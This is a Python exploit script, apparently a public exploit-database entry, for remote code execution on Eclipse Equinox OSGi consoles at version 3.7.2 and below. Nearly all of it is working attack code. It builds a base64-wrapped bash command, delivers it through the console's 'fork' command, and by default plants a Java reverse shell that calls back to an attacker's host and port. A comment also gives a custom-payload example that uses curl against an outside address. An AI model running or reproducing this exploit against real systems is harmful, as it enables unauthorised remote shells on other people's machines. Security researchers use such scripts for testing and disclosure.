OSGi v3.7.2 (and below) Console - RCE

1. #!/usr/bin/python
2.  
3. # Exploit Title: [OSGi v3.7.2 Console RCE]
4. # Date: [2023-07-28]
5. # Exploit Author: [Andrzej Olchawa, Milenko Starcik,
6. #                  VisionSpace Technologies GmbH]
7. # Exploit Repository:
8. #           [https://github.com/visionspacetec/offsec-osgi-exploits.git]
9. # Vendor Homepage: [https://eclipse.dev/equinox]
10. # Software Link: [https://archive.eclipse.org/equinox/]
11. # Version: [3.7.2 and before]
12. # Tested on: [Linux kali 6.3.0-kali1-amd64]
13. # License: [MIT]
14. #
15. # Usage:
16. # python exploit.py --help
17. #
18. # Examples:
19. # python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \
20. #   --lport=4444
21. #
22. # python exploit.py --rhost=localhost --rport=1337 --payload= \
23. #   "curl http://192.168.100.100/osgi_test"
24.  
25.  
26. """
27. This is an exploit that allows to open a reverse shell connection from
28. the system running OSGi v3.7.2 and earlier.
29. """
30. import argparse
31. import base64
32. import socket
33.  
34.  
35. def parse():
36.     """
37.    This fnction is used to parse and return command-line arguments.
38.    """
39.  
40.     parser = argparse.ArgumentParser(
41.         prog="OSGi-3.7.2-console-RCE",
42.         description="This tool will let you open a reverse shell from the "
43.                     "system that is running OSGi with the '-console' "
44.                     "option in version 3.7.2 (or before).",
45.         epilog="Happy Hacking! :)",
46.     )
47.  
48.     parser.add_argument("--rhost", dest="rhost",
49.                         help="remote host", type=str, required=True)
50.     parser.add_argument("--rport", dest="rport",
51.                         help="remote port", type=int, required=True)
52.     parser.add_argument("--lhost", dest="lhost",
53.                         help="local host", type=str, required=False)
54.     parser.add_argument("--lport", dest="lport",
55.                         help="local port", type=int, required=False)
56.     parser.add_argument("--payload", dest="custom_payload",
57.                         help="custom payload", type=str, required=False)
58.     parser.add_argument("--version", action="version",
59.                         version="%(prog)s 0.1.0")
60.  
61.     args = parser.parse_args()
62.  
63.     if args.custom_payload and (args.lhost or args.lport):
64.         parser.error(
65.             "either --payload or both --lport and --rport are required.")
66.  
67.     return args
68.  
69.  
70. def generate_payload(lhost, lport, custom_payload):
71.     """
72.    This function generates the whole payload ready for the delivery.
73.    """
74.  
75.     payload = ""
76.  
77.     if custom_payload:
78.         payload = custom_payload
79.  
80.         print("(*) Using custom payload.")
81.     elif lhost and lport:
82.         payload = \
83.             "echo 'import java.io.IOException;import java.io.InputStream;" \
84.             "import java.io.OutputStream;import java.net.Socket;class Rev" \
85.             "Shell {public static void main(String[] args) throws Excepti" \
86.             "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \
87.             "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \
88.             ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \
89.             "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \
90.             "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \
91.             ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \
92.             "e(pe.available()>0)so.write(pe.read());while(si.available()>" \
93.             "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \
94.             ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \
95.             ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (
96.                 lhost, lport)
97.  
98.         print("(+) Using Java reverse shell payload.")
99.  
100.     bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (
101.         base64.b64encode(payload.encode()))
102.  
103.     wrapped_payload = b"fork \"%s\"\n" % (bash_payload)
104.  
105.     return wrapped_payload
106.  
107.  
108. def deliver_payload(rhost, rport, payload):
109.     """
110.    This function connects to the target host and delivers the payload.
111.    It returns True if successful; False otherwise.
112.    """
113.  
114.     print("(*) Sending payload...")
115.  
116.     try:
117.         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
118.         sock.connect((rhost, rport))
119.         sock.send(payload)
120.         sock.close()
121.     except socket.error as err:
122.         print(f"(-) Could not deliver the payload to {rhost}:{rport}!")
123.         print(err)
124.         return False
125.  
126.     return True
127.  
128.  
129. def main(args):
130.     """
131.    Main function.
132.    """
133.  
134.     payload = generate_payload(args.lhost, args.lport, args.custom_payload)
135.  
136.     success = deliver_payload(args.rhost, args.rport, payload)
137.     if success:
138.         print("(+) Done.")
139.     else:
140.         print("(-) Finished with errors.")
141.  
142.  
143. if __name__ == "__main__":
144.     main(parse())
145.